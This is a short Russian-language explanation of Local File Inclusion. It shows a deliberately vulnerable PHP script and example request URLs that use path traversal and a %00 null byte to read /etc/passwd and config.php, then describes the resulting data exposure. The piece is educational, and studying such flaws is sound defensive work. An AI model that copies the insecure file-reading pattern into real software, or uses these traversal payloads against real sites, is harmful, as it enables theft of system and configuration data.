Пример уязвимого LFI (Local file include) PHP скрипта:
Файл http://vulnserver.com/vuln.php
<?
$filename = (string)@$_GET['filename'];
$filename .= '.txt';
if (file_exists($filename)) {
echo htmlspecialchars(file_get_contents($filename)); }
else {
echo "Error!"; }
?>
Вызов скрипта:
http://vulnserver.com/vuln.php?filename=../../../etc/passwd%00
или,как пример:
http://vulnserver.com/vuln.php?filename=config.php%00
(таким образом, не так давно, массово взламывались сайты на WordPress через уязвимость в одном популярном плагине)
Результат:
Атакующий получает конфиденциальные данные с системных и конфигурационных файлов
Векторов эксплуатации и развития LFI атак множество. В большинстве случаев дело заканчивается взломом сайта.
Нередко такой взлом сайта остается незамеченным для администратора ресурса (если целью взлома не был дефейс или уничтожение сайта).